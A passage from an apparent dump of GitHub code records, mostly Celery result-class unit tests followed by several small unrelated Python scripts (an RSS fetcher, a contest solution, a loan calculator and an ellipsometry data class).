i, states.SUCCESS) for i in range(3)]\n x._cache = {'children': children, 'status': states.SUCCESS}\n x.backend = Mock()\n self.assertTrue(x.children)\n self.assertEqual(len(x.children), 3)\n\n def test_propagates_for_parent(self):\n x = self.app.AsyncResult(uuid())\n x.backend = Mock(name='backend')\n x.backend.get_task_meta.return_value = {}\n x.backend.wait_for.return_value = {\n 'status': states.SUCCESS, 'result': 84,\n }\n x.parent = EagerResult(uuid(), KeyError('foo'), states.FAILURE)\n with self.assertRaises(KeyError):\n x.get(propagate=True)\n self.assertFalse(x.backend.wait_for.called)\n\n x.parent = EagerResult(uuid(), 42, states.SUCCESS)\n self.assertEqual(x.get(propagate=True), 84)\n self.assertTrue(x.backend.wait_for.called)\n\n def test_get_children(self):\n tid = uuid()\n x = self.app.AsyncResult(tid)\n child = [self.app.AsyncResult(uuid()).as_tuple()\n for i in range(10)]\n x._cache = {'children': child}\n self.assertTrue(x.children)\n self.assertEqual(len(x.children), 10)\n\n x._cache = {'status': states.SUCCESS}\n x.backend._cache[tid] = {'result': None}\n self.assertIsNone(x.children)\n\n def test_build_graph_get_leaf_collect(self):\n x = self.app.AsyncResult('1')\n x.backend._cache['1'] = {'status': states.SUCCESS, 'result': None}\n c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x.iterdeps = Mock()\n x.iterdeps.return_value = (\n (None, x),\n (x, c[0]),\n (c[0], c[1]),\n (c[1], c[2])\n )\n x.backend.READY_STATES = states.READY_STATES\n self.assertTrue(x.graph)\n\n self.assertIs(x.get_leaf(), 2)\n\n it = x.collect()\n self.assertListEqual(list(it), [\n (x, None),\n (c[0], 
0),\n (c[1], 1),\n (c[2], 2),\n ])\n\n def test_iterdeps(self):\n x = self.app.AsyncResult('1')\n c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)]\n x._cache = {'status': states.SUCCESS, 'result': None, 'children': c}\n for child in c:\n child.backend = Mock()\n child.backend.get_children.return_value = []\n it = x.iterdeps()\n self.assertListEqual(list(it), [\n (None, x),\n (x, c[0]),\n (x, c[1]),\n (x, c[2]),\n ])\n x._cache = None\n x.ready = Mock()\n x.ready.return_value = False\n with self.assertRaises(IncompleteStream):\n list(x.iterdeps())\n list(x.iterdeps(intermediate=True))\n\n def test_eq_not_implemented(self):\n self.assertFalse(self.app.AsyncResult('1') == object())\n\n @depends_on_current_app\n def test_reduce(self):\n a1 = self.app.AsyncResult('uuid', task_name=self.mytask.name)\n restored = pickle.loads(pickle.dumps(a1))\n self.assertEqual(restored.id, 'uuid')\n self.assertEqual(restored.task_name, self.mytask.name)\n\n a2 = self.app.AsyncResult('uuid')\n self.assertEqual(pickle.loads(pickle.dumps(a2)).id, 'uuid')\n\n def test_successful(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok_res2 = self.app.AsyncResult(self.task4['id'])\n\n self.assertTrue(ok_res.successful())\n self.assertFalse(nok_res.successful())\n self.assertFalse(nok_res2.successful())\n\n pending_res = self.app.AsyncResult(uuid())\n self.assertFalse(pending_res.successful())\n\n def test_str(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n self.assertEqual(str(ok_res), self.task1['id'])\n self.assertEqual(str(ok2_res), self.task2['id'])\n self.assertEqual(str(nok_res), self.task3['id'])\n\n pending_id = uuid()\n pending_res = self.app.AsyncResult(pending_id)\n self.assertEqual(str(pending_res), pending_id)\n\n def test_repr(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n self.assertEqual(repr(ok_res), '' % (\n self.task1['id']))\n self.assertEqual(repr(ok2_res), '' % (\n self.task2['id']))\n self.assertEqual(repr(nok_res), '' % (\n self.task3['id']))\n\n pending_id = uuid()\n pending_res = self.app.AsyncResult(pending_id)\n self.assertEqual(repr(pending_res), '' % (\n pending_id))\n\n def test_hash(self):\n self.assertEqual(hash(self.app.AsyncResult('x0w991')),\n hash(self.app.AsyncResult('x0w991')))\n self.assertNotEqual(hash(self.app.AsyncResult('x0w991')),\n hash(self.app.AsyncResult('x1w991')))\n\n def test_get_traceback(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok_res2 = self.app.AsyncResult(self.task4['id'])\n self.assertFalse(ok_res.traceback)\n self.assertTrue(nok_res.traceback)\n self.assertTrue(nok_res2.traceback)\n\n pending_res = self.app.AsyncResult(uuid())\n self.assertFalse(pending_res.traceback)\n\n def test_get(self):\n ok_res = self.app.AsyncResult(self.task1['id'])\n ok2_res = self.app.AsyncResult(self.task2['id'])\n nok_res = self.app.AsyncResult(self.task3['id'])\n nok2_res = self.app.AsyncResult(self.task4['id'])\n\n self.assertEqual(ok_res.get(), 'the')\n self.assertEqual(ok2_res.get(), 'quick')\n with self.assertRaises(KeyError):\n nok_res.get()\n self.assertTrue(nok_res.get(propagate=False))\n self.assertIsInstance(nok2_res.result, KeyError)\n self.assertEqual(ok_res.info, 'the')\n\n def test_get_timeout(self):\n 
res = self.app.AsyncResult(self.task4['id']) # has RETRY state\n with self.assertRaises(TimeoutError):\n res.get(timeout=0.001)\n\n pending_res = self.app.AsyncResult(uuid())\n with patch('celery.result.time') as _time:\n with self.assertRaises(TimeoutError):\n pending_res.get(timeout=0.001, interval=0.001)\n _time.sleep.assert_called_with(0.001)\n\n def test_get_timeout_longer(self):\n res = self.app.AsyncResult(self.task4['id']) # has RETRY state\n with patch('celery.result.time') as _time:\n with self.assertRaises(TimeoutError):\n res.get(timeout=1, interval=1)\n _time.sleep.assert_called_with(1)\n\n def test_ready(self):\n oks = (self.app.AsyncResult(self.task1['id']),\n self.app.AsyncResult(self.task2['id']),\n self.app.AsyncResult(self.task3['id']))\n self.assertTrue(all(result.ready() for result in oks))\n self.assertFalse(self.app.AsyncResult(self.task4['id']).ready())\n\n self.assertFalse(self.app.AsyncResult(uuid()).ready())\n\n\nclass test_ResultSet(AppCase):\n\n def test_resultset_repr(self):\n self.assertTrue(repr(self.app.ResultSet(\n [self.app.AsyncResult(t) for t in ['1', '2', '3']])))\n\n def test_eq_other(self):\n self.assertFalse(self.app.ResultSet([1, 3, 3]) == 1)\n self.assertTrue(self.app.ResultSet([1]) == self.app.ResultSet([1]))\n\n def test_get(self):\n x = self.app.ResultSet([self.app.AsyncResult(t) for t in [1, 2, 3]])\n b = x.results[0].backend = Mock()\n b.supports_native_join = False\n x.join_native = Mock()\n x.join = Mock()\n x.get()\n self.assertTrue(x.join.called)\n b.supports_native_join = True\n x.get()\n self.assertTrue(x.join_native.called)\n\n def test_get_empty(self):\n x = self.app.ResultSet([])\n self.assertIsNone(x.supports_native_join)\n x.join = Mock(name='join')\n x.get()\n self.assertTrue(x.join.called)\n\n def test_add(self):\n x = self.app.ResultSet([1])\n x.add(2)\n self.assertEqual(len(x), 2)\n x.add(2)\n self.assertEqual(len(x), 2)\n\n @contextmanager\n def dummy_copy(self):\n with patch('celery.result.copy') as copy:\n\n def passt(arg):\n return arg\n copy.side_effect = passt\n\n yield\n\n def test_iterate_respects_subpolling_interval(self):\n r1 = self.app.AsyncResult(uuid())\n r2 = self.app.AsyncResult(uuid())\n backend = r1.backend = r2.backend = Mock()\n backend.subpolling_interval = 10\n\n ready = r1.ready = r2.ready = Mock()\n\n def se(*args, **kwargs):\n ready.side_effect = KeyError()\n return False\n ready.return_value = False\n ready.side_effect = se\n\n x = self.app.ResultSet([r1, r2])\n with self.dummy_copy():\n with patch('celery.result.time') as _time:\n with self.assertPendingDeprecation():\n with self.assertRaises(KeyError):\n list(x.iterate())\n _time.sleep.assert_called_with(10)\n\n backend.subpolling_interval = 0\n with patch('celery.result.time') as _time:\n with self.assertPendingDeprecation():\n with self.assertRaises(KeyError):\n ready.return_value = False\n ready.side_effect = se\n list(x.iterate())\n self.assertFalse(_time.sleep.called)\n\n def test_times_out(self):\n r1 = self.app.AsyncResult(uuid)\n r1.ready = Mock()\n r1.ready.return_value = False\n x = self.app.ResultSet([r1])\n with self.dummy_copy():\n with patch('celery.result.time'):\n with self.assertPendingDeprecation():\n with self.assertRaises(TimeoutError):\n list(x.iterate(timeout=1))\n\n def test_add_discard(self):\n x = self.app.ResultSet([])\n x.add(self.app.AsyncResult('1'))\n self.assertIn(self.app.AsyncResult('1'), x.results)\n x.discard(self.app.AsyncResult('1'))\n x.discard(self.app.AsyncResult('1'))\n x.discard('1')\n 
self.assertNotIn(self.app.AsyncResult('1'), x.results)\n\n x.update([self.app.AsyncResult('2')])\n\n def test_clear(self):\n x = self.app.ResultSet([])\n r = x.results\n x.clear()\n self.assertIs(x.results, r)\n\n\nclass MockAsyncResultFailure(AsyncResult):\n\n @property\n def result(self):\n return KeyError('baz')\n\n @property\n def state(self):\n return states.FAILURE\n\n def get(self, propagate=True, **kwargs):\n if propagate:\n raise self.result\n return self.result\n\n\nclass MockAsyncResultSuccess(AsyncResult):\n forgotten = False\n\n def forget(self):\n self.forgotten = True\n\n @property\n def result(self):\n return 42\n\n @property\n def state(self):\n return states.SUCCESS\n\n def get(self, **kwargs):\n return self.result\n\n\nclass SimpleBackend(object):\n ids = []\n\n def __init__(self, ids=[]):\n self.ids = ids\n\n def get_many(self, *args, **kwargs):\n return ((id, {'result': i, 'status': states.SUCCESS})\n for i, id in enumerate(self.ids))\n\n\nclass test_TaskSetResult(AppCase):\n\n def setup(self):\n self.size = 10\n self.ts = TaskSetResult(uuid(), make_mock_group(self.app, self.size))\n\n def test_total(self):\n self.assertEqual(self.ts.total, self.size)\n\n def test_compat_properties(self):\n self.assertEqual(self.ts.taskset_id, self.ts.id)\n self.ts.taskset_id = 'foo'\n self.assertEqual(self.ts.taskset_id, 'foo')\n\n def test_compat_subtasks_kwarg(self):\n x = TaskSetResult(uuid(), subtasks=[1, 2, 3])\n self.assertEqual(x.results, [1, 2, 3])\n\n def test_itersubtasks(self):\n it = self.ts.itersubtasks()\n\n for i, t in enumerate(it):\n self.assertEqual(t.get(), i)\n\n\nclass test_GroupResult(AppCase):\n\n def setup(self):\n self.size = 10\n self.ts = self.app.GroupResult(\n uuid(), make_mock_group(self.app, self.size),\n )\n\n @depends_on_current_app\n def test_is_pickleable(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertEqual(pickle.loads(pickle.dumps(ts)), ts)\n ts2 = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertEqual(pickle.loads(pickle.dumps(ts2)), ts2)\n\n def test_len(self):\n self.assertEqual(len(self.ts), self.size)\n\n def test_eq_other(self):\n self.assertFalse(self.ts == 1)\n\n @depends_on_current_app\n def test_reduce(self):\n self.assertTrue(pickle.loads(pickle.dumps(self.ts)))\n\n def test_iterate_raises(self):\n ar = MockAsyncResultFailure(uuid(), app=self.app)\n ts = self.app.GroupResult(uuid(), [ar])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n with self.assertRaises(KeyError):\n next(it)\n\n def test_forget(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n ts.forget()\n for sub in subs:\n self.assertTrue(sub.forgotten)\n\n def test_getitem(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n self.assertIs(ts[0], subs[0])\n\n def test_save_restore(self):\n subs = [MockAsyncResultSuccess(uuid(), app=self.app),\n MockAsyncResultSuccess(uuid(), app=self.app)]\n ts = self.app.GroupResult(uuid(), subs)\n ts.save()\n with self.assertRaises(AttributeError):\n ts.save(backend=object())\n self.assertEqual(self.app.GroupResult.restore(ts.id).subtasks,\n ts.subtasks)\n ts.delete()\n self.assertIsNone(self.app.GroupResult.restore(ts.id))\n with self.assertRaises(AttributeError):\n self.app.GroupResult.restore(ts.id, backend=object())\n\n def test_join_native(self):\n backend = 
SimpleBackend()\n subtasks = [self.app.AsyncResult(uuid(), backend=backend)\n for i in range(10)]\n ts = self.app.GroupResult(uuid(), subtasks)\n ts.app.backend = backend\n backend.ids = [subtask.id for subtask in subtasks]\n res = ts.join_native()\n self.assertEqual(res, list(range(10)))\n\n def test_join_native_raises(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n ts.iter_native = Mock()\n ts.iter_native.return_value = iter([\n (uuid(), {'status': states.FAILURE, 'result': KeyError()})\n ])\n with self.assertRaises(KeyError):\n ts.join_native(propagate=True)\n\n def test_failed_join_report(self):\n res = Mock()\n ts = self.app.GroupResult(uuid(), [res])\n res.state = states.FAILURE\n res.backend.is_cached.return_value = True\n self.assertIs(next(ts._failed_join_report()), res)\n res.backend.is_cached.return_value = False\n with self.assertRaises(StopIteration):\n next(ts._failed_join_report())\n\n def test_repr(self):\n self.assertTrue(repr(\n self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n ))\n\n def test_children_is_results(self):\n ts = self.app.GroupResult(uuid(), [self.app.AsyncResult(uuid())])\n self.assertIs(ts.children, ts.results)\n\n def test_iter_native(self):\n backend = SimpleBackend()\n subtasks = [self.app.AsyncResult(uuid(), backend=backend)\n for i in range(10)]\n ts = self.app.GroupResult(uuid(), subtasks)\n ts.app.backend = backend\n backend.ids = [subtask.id for subtask in subtasks]\n self.assertEqual(len(list(ts.iter_native())), 10)\n\n def test_iterate_yields(self):\n ar = MockAsyncResultSuccess(uuid(), app=self.app)\n ar2 = MockAsyncResultSuccess(uuid(), app=self.app)\n ts = self.app.GroupResult(uuid(), [ar, ar2])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n self.assertEqual(next(it), 42)\n self.assertEqual(next(it), 42)\n\n def test_iterate_eager(self):\n ar1 = EagerResult(uuid(), 42, states.SUCCESS)\n ar2 = EagerResult(uuid(), 42, states.SUCCESS)\n ts = self.app.GroupResult(uuid(), [ar1, ar2])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n self.assertEqual(next(it), 42)\n self.assertEqual(next(it), 42)\n\n def test_join_timeout(self):\n ar = MockAsyncResultSuccess(uuid(), app=self.app)\n ar2 = MockAsyncResultSuccess(uuid(), app=self.app)\n ar3 = self.app.AsyncResult(uuid())\n ts = self.app.GroupResult(uuid(), [ar, ar2, ar3])\n with self.assertRaises(TimeoutError):\n ts.join(timeout=0.0000001)\n\n ar4 = self.app.AsyncResult(uuid())\n ar4.get = Mock()\n ts2 = self.app.GroupResult(uuid(), [ar4])\n self.assertTrue(ts2.join(timeout=0.1))\n\n def test_iter_native_when_empty_group(self):\n ts = self.app.GroupResult(uuid(), [])\n self.assertListEqual(list(ts.iter_native()), [])\n\n def test_iterate_simple(self):\n with self.assertPendingDeprecation():\n it = self.ts.iterate()\n results = sorted(list(it))\n self.assertListEqual(results, list(range(self.size)))\n\n def test___iter__(self):\n self.assertListEqual(list(iter(self.ts)), self.ts.results)\n\n def test_join(self):\n joined = self.ts.join()\n self.assertListEqual(joined, list(range(self.size)))\n\n def test_successful(self):\n self.assertTrue(self.ts.successful())\n\n def test_failed(self):\n self.assertFalse(self.ts.failed())\n\n def test_waiting(self):\n self.assertFalse(self.ts.waiting())\n\n def test_ready(self):\n self.assertTrue(self.ts.ready())\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), len(self.ts))\n\n\nclass test_pending_AsyncResult(AppCase):\n\n def setup(self):\n self.task = 
self.app.AsyncResult(uuid())\n\n def test_result(self):\n self.assertIsNone(self.task.result)\n\n\nclass test_failed_AsyncResult(test_GroupResult):\n\n def setup(self):\n self.size = 11\n subtasks = make_mock_group(self.app, 10)\n failed = mock_task('ts11', states.FAILURE, KeyError('Baz'))\n save_result(self.app, failed)\n failed_res = self.app.AsyncResult(failed['id'])\n self.ts = self.app.GroupResult(uuid(), subtasks + [failed_res])\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), len(self.ts) - 1)\n\n def test_iterate_simple(self):\n with self.assertPendingDeprecation():\n it = self.ts.iterate()\n\n def consume():\n return list(it)\n\n with self.assertRaises(KeyError):\n consume()\n\n def test_join(self):\n with self.assertRaises(KeyError):\n self.ts.join()\n\n def test_successful(self):\n self.assertFalse(self.ts.successful())\n\n def test_failed(self):\n self.assertTrue(self.ts.failed())\n\n\nclass test_pending_Group(AppCase):\n\n def setup(self):\n self.ts = self.app.GroupResult(\n uuid(), [self.app.AsyncResult(uuid()),\n self.app.AsyncResult(uuid())])\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), 0)\n\n def test_ready(self):\n self.assertFalse(self.ts.ready())\n\n def test_waiting(self):\n self.assertTrue(self.ts.waiting())\n\n def x_join(self):\n with self.assertRaises(TimeoutError):\n self.ts.join(timeout=0.001)\n\n def x_join_longer(self):\n with self.assertRaises(TimeoutError):\n self.ts.join(timeout=1)\n\n\nclass test_EagerResult(AppCase):\n\n def setup(self):\n\n @self.app.task(shared=False)\n def raising(x, y):\n raise KeyError(x, y)\n self.raising = raising\n\n def test_wait_raises(self):\n res = self.raising.apply(args=[3, 3])\n with self.assertRaises(KeyError):\n res.wait()\n self.assertTrue(res.wait(propagate=False))\n\n def test_wait(self):\n res = EagerResult('x', 'x', states.RETRY)\n res.wait()\n self.assertEqual(res.state, states.RETRY)\n self.assertEqual(res.status, states.RETRY)\n\n def test_forget(self):\n res = EagerResult('x', 'x', states.RETRY)\n res.forget()\n\n def test_revoke(self):\n res = self.raising.apply(args=[3, 3])\n self.assertFalse(res.revoke())\n\n\nclass test_tuples(AppCase):\n\n def test_AsyncResult(self):\n x = self.app.AsyncResult(uuid())\n self.assertEqual(x, result_from_tuple(x.as_tuple(), self.app))\n self.assertEqual(x, result_from_tuple(x, self.app))\n\n def test_with_parent(self):\n x = self.app.AsyncResult(uuid())\n x.parent = self.app.AsyncResult(uuid())\n y = result_from_tuple(x.as_tuple(), self.app)\n self.assertEqual(y, x)\n self.assertEqual(y.parent, x.parent)\n self.assertIsInstance(y.parent, AsyncResult)\n\n def test_compat(self):\n uid = uuid()\n x = result_from_tuple([uid, []], app=self.app)\n self.assertEqual(x.id, uid)\n\n def test_GroupResult(self):\n x = self.app.GroupResult(\n uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)],\n )\n self.assertEqual(x, result_from_tuple(x.as_tuple(), self.app))\n self.assertEqual(x, result_from_tuple(x, self.app))\n","repo_name":"Chudry/Xerror","sub_path":"env/lib/python2.7/site-packages/celery/tests/tasks/test_result.py","file_name":"test_result.py","file_ext":"py","file_size_in_byte":24135,"program_lang":"python","lang":"en","doc_type":"code","stars":477,"dataset":"github-code","pt":"16"}
+{"seq_id":"37360285773","text":"#coding: utf8\r\n\r\nimport unittest\r\nimport os\r\nfrom workers import cnbeta\r\n\r\nclass CnBetaTests(unittest.TestCase):\r\n\r\n def setUp(self):\r\n dir_name = os.path.dirname(os.path.realpath(__file__))\r\n with open(os.path.join(dir_name, \"testdata/cnbeta/1.txt\"), encoding='utf8') as f:\r\n self.text_data = f.read()\r\n\r\n def test_get_comments_details(self):\r\n details = cnbeta.get_comments_details(self.text_data)\r\n self.assertIsNotNone(details)\r\n self.assertEqual(2, len(details))\r\n self.assertEqual(\"270774\", details[0])\r\n self.assertEqual(\"4f299\", details[1])\r\n\r\n def test_get_op_code(self):\r\n op_code = cnbeta.get_op_code(\"270774\", \"4f299\", 1)\r\n self.assertEqual(\"MSwyNzA3NzQsNGYyOTk=1234567\", op_code)\r\n\r\n def test_get_comments(self):\r\n op_code = \"MSwyNzA2NTAsYTYwMWI%3DuscCHONc\"\r\n comments = cnbeta.get_comments(op_code)\r\n self.assertIsNotNone(comments)\r\n\r\n def test_get_article_list(self):\r\n article_list = cnbeta.get_article_list(1)\r\n self.assertIsNotNone(article_list)\r\n self.assertEqual(30, len(article_list))\r\n","repo_name":"Syndim/NewsReader","sub_path":"website/tests/workers/cnbeta.py","file_name":"cnbeta.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20899756132","text":"import sys\n\n\ndef menu(userinput):\n while userinput is not 'q':\n if userinput == '1':\n print(userinput)\n if userinput == '2':\n print(userinput + str(2))\n if userinput == 'q':\n sys.exit(0)\n print(\"1. GoDie \\n 2. GoSwim\\n 3. GoDance\\n 4. q - Quit\")\n userinput = input(\"Enter your choice: \")\n\n\ndef test():\n print(\"\\n1. GoDie \\n 2. GoSwim\\n 3. GoDance\\n 4. q - Quit\")\n userinput = input(\"Enter your choice: \")\n if userinput == 'q':\n sys.exit(0)\n menu(userinput)\n\n\nif __name__ == '__main__':\n test()","repo_name":"bikash0109/Python-Progs","sub_path":"first sem/Lab7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22916037464","text":"import sys\r\n\r\nsys.stdin = open(\"b1.in\", \"r\")\r\n#sys.stdout = open(\"b1.out\", \"w\")\r\nT = int(input())\r\n\r\n#B1\r\ndef rec(N):\r\n if N == 1:\r\n return 0\r\n if N % 3 == 0:\r\n Y, Z = N / 3, 2 * N / 3\r\n return int(Y * Z) + rec(Y) + rec(Z)\r\n elif N % 2 == 0:\r\n return int((N/2)**2) + rec(N/2)\r\n else:\r\n return int(N - 1) + int(rec(N - 1))\r\n\r\nfor _ in range(T):\r\n input()\r\n N = int(input())\r\n print(rec(N))\r\n","repo_name":"aajjbb/contest-files","sub_path":"IPSC/BoredomBusters.py","file_name":"BoredomBusters.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"28160671378","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport feedparser\nimport os\nimport re\n\nclass RssFetcher():\n def getCon(self, rssSub):\n self.rssCon = feedparser.parse(rssSub)\n\n def outputer(self, num = 20):\n rssTitle = []\n rssSummary = []\n rssEntries = self.rssCon['entries']\n delPattern = re.compile(\"\")\n for i in range(len(rssEntries)):\n rssTitle.append(rssEntries[i]['title'])\n reSummary = re.sub(\"\", '', ''.join(rssEntries[i]['summary'].split('\\n')))\n reSummary = re.sub(\"\", '', reSummary)\n rssSummary.append(reSummary)\n if i >= num:\n break\n return rssTitle, rssSummary\n\nclass RssFetcher1():\n def getCon(self, rssSub):\n self.rssCon = feedparser.parse(rssSub)\n\n def outputer(self, num = 20):\n rssTitle = []\n rssSummary = []\n rssEntries = self.rssCon['entries']\n summary_pattern = re.compile(\"
(.*?)
\", re.S)\n for i in range(len(rssEntries)):\n rssTitle.append(rssEntries[i]['title'])\n if not re.findall('
', rssEntries[i]['summary']) == []:\n reSummary = '{enter}'.join(summary_pattern.findall(rssEntries[i]['summary']))\n else: reSummary = rssEntries[i]['summary']\n rssSummary.append(reSummary)\n if i >= num:\n break\n return rssTitle, rssSummary\n\n def run(self):\n self.getCon()\n return self.outputer()\n","repo_name":"cycoe/RSSReader","sub_path":"rssFetcher.py","file_name":"rssFetcher.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36213132488","text":"import time\r\n\r\ncasa = float(input('Qual o valor da casa em questão? R$'))\r\nsal = float(input('Qual o salário do comprador? R$'))\r\nanos = int(input('Em quantos anos EXATOS você deseja pagar? >'))\r\n\r\ntrintaPCen = sal * 0.3\r\n\r\nanoMes = anos * 12\r\nmensalidade = casa / anoMes\r\n\r\n\r\ncores = {'vermelho':'\\033[31m',\r\n 'limpo': '\\033[m',\r\n 'verde': '\\033[32m'}\r\n\r\nprint('\\033[97;40mCalculando...\\033[m')\r\ntime.sleep(2)\r\n\r\nif mensalidade > trintaPCen:\r\n print('{}Infelizmente{} o preço da parcela iria lhe causar prejuízo. \\n'\r\n 'Recomendamos aumentar o tempo das parcelas, ou procurar por outra opção.'.format(\r\n cores['vermelho'],cores['limpo']))\r\n\r\n print(cores['vermelho'])\r\n\r\nelse:\r\n print('{}Parabéns!{} O preço está em conta com o seu salário.\\n'\r\n 'Em instantes disponibilizaremos um link e enviaremos para o seu email.\\n'\r\n 'AGUARDE!'.format(cores['verde'],cores['limpo']))\r\n\r\n print(cores['verde'])\r\n\r\ntime.sleep(1)\r\nprint('-='*30)\r\ntime.sleep(1)\r\nprint(f'Valor à pagar R${mensalidade:.2f}/mês, durante {anos} anos.')\r\nprint(f'•O valor máximo com base no seu salário é de {trintaPCen:.2f}')\r\nprint(cores['limpo'])","repo_name":"S4Yuuki/Curso.py","sub_path":"Atividades/036.py","file_name":"036.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"129964661","text":"import sys\nfrom collections import Counter\n\ninput = sys.stdin.readline\n\ncounter = Counter()\nN = int(input())\nfor _ in range(N):\n s = input().strip()\n counter[s] += 1\nprint(sorted(counter.most_common(), key=lambda x:(-x[1], x[0]))[0][0])\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Hash/1302.py","file_name":"1302.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34311017350","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\"\nA basic representation of a 1D dataset\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom refnx._lib import possibly_open_file\nfrom pathlib import PurePath\n\npd.options.mode.chained_assignment = None\n\n\nclass DataSE(object):\n r\"\"\"\n A basic representation of a 1D dataset.\n\n Parameters\n ----------\n data : {str, file-like, Path, tuple of np.ndarray}, optional\n String pointing to a data file.\n Alternatively it is a tuple containing the data from which the dataset\n will be constructed. The tuple should have 4 members.\n\n - data[0] - Wavelength (nm)\n - data[1] - Angle of incidence (degree)\n - data[2] - Psi\n - data[3] - Delta\n\n `data` must be four long.\n All arrays must have the same shape.\n\n mask : array-like\n Specifies which data points are (un)masked. Must be broadcastable\n to the data. `Data1D.mask = None` clears the mask. If a mask value\n equates to `True`, then the point is included, if a mask value equates\n to `False` it is excluded.\n\n reflect_delta : bool\n Specifies whether delta values are reflected around 180 degrees\n (i.e., 360 - delta[delta > 180]), as is standard for some ellipsometry\n analysis packages (i.e., WVASE).\n\n Attributes\n ----------\n AOI : np.ndarray\n angle of incidence (degree)\n mask : np.ndarray\n mask\n filename : str or None\n The file the data was read from\n weighted : bool\n Whether the y data has uncertainties\n metadata : dict\n Information that should be retained with the dataset.\n \"\"\"\n\n def __init__(\n self, data=None, name=None, delimiter=\"\\t\", reflect_delta=False, **kwds\n ):\n self.filename = None\n\n self.delimiter = delimiter\n self.metadata = kwds\n self._wavelength = np.zeros(0)\n self._aoi = np.zeros(0)\n self._psi = np.zeros(0)\n self._delta = np.zeros(0)\n # TODO when we come up with measurement uncertainties change this.\n self.weighted = False\n self.name = name\n\n # If a file, then open and load the file.\n if (\n hasattr(data, \"read\")\n or type(data) is str\n or isinstance(data, PurePath)\n ):\n self.load(data)\n self.filename = data\n\n # If already a DataSE object, then just use that.\n elif isinstance(data, DataSE):\n self.name = data.name\n self.filename = data.filename\n self.metadata = data.metadata\n self._wavelength = data._wavelength\n self._aoi = data._aoi\n self._psi = data._psi\n self._delta = data._delta\n\n # If a list or tuple, then assume its in format wavelength, AOI, psi, delta.\n elif isinstance(data, (list, tuple, np.ndarray)):\n self._wavelength = data[0]\n self._aoi = data[1]\n self._psi = data[2]\n self._delta = data[3]\n\n self._delta_flipped = False\n if reflect_delta:\n dmask = self._delta > 180\n self._delta[dmask] = 360 - self._delta[dmask]\n self._delta_flipped = True\n\n self.mask = np.ones_like(self._wavelength, dtype=bool)\n\n def __len__(self):\n \"\"\"Number of unmasked points in the dataset.\"\"\"\n return self.wavelength.size\n\n def __str__(self):\n return \"<{0}>, {1} points\".format(self.name, len(self))\n\n def __repr__(self):\n msk = self.mask\n if np.all(self.mask):\n msk = None\n\n d = {\"filename\": self.filename, \"msk\": msk, \"data\": self.data}\n if self.filename is not None:\n return \"Data1D(data={filename!r},\" \" mask={msk!r})\".format(**d)\n else:\n return \"Data1D(data={data!r},\" \" mask={msk!r})\".format(**d)\n\n def unique_wavelength_data(self):\n \"\"\"\n Generator yielding wavelength, AOI, psi, delta tuples for the unique\n wavelengths in a dataset (i.e. 
all the data points for a given\n wavelength)\n\n Returns\n -------\n wavelength, AOI, psi, delta\n \"\"\"\n unique_wavs = np.unique(self.wavelength)\n for unique_wav in unique_wavs:\n loc = np.where(self.wavelength == unique_wav)\n yield unique_wav, self.aoi[loc], self.psi[loc], self.delta[loc]\n\n @property\n def wavelength(self):\n \"\"\"wavelength(nm)\"\"\"\n\n if self._wavelength.size > 0:\n return self._wavelength[self.mask]\n else:\n return self._wavelength\n\n @property\n def aoi(self):\n \"\"\"Angle of incidence.\"\"\"\n if self._aoi.size > 0:\n return self._aoi[self.mask]\n else:\n return self._aoi\n\n @property\n def psi(self):\n \"\"\"Ellipsometric parameter psi.\"\"\"\n if self._psi.size > 0:\n return self._psi[self.mask]\n else:\n return self._psi\n\n @property\n def delta(self):\n \"\"\"Ellipsometric parameter delta.\"\"\"\n if self._delta.size > 0:\n return self._delta[self.mask]\n else:\n return self._delta\n\n @property\n def data(self):\n \"\"\"4-tuple containing the (wavelength), AOI, psi, delta) data.\"\"\"\n return self.wavelength, self.aoi, self.psi, self.delta\n\n @data.setter\n def data(self, data_tuple):\n 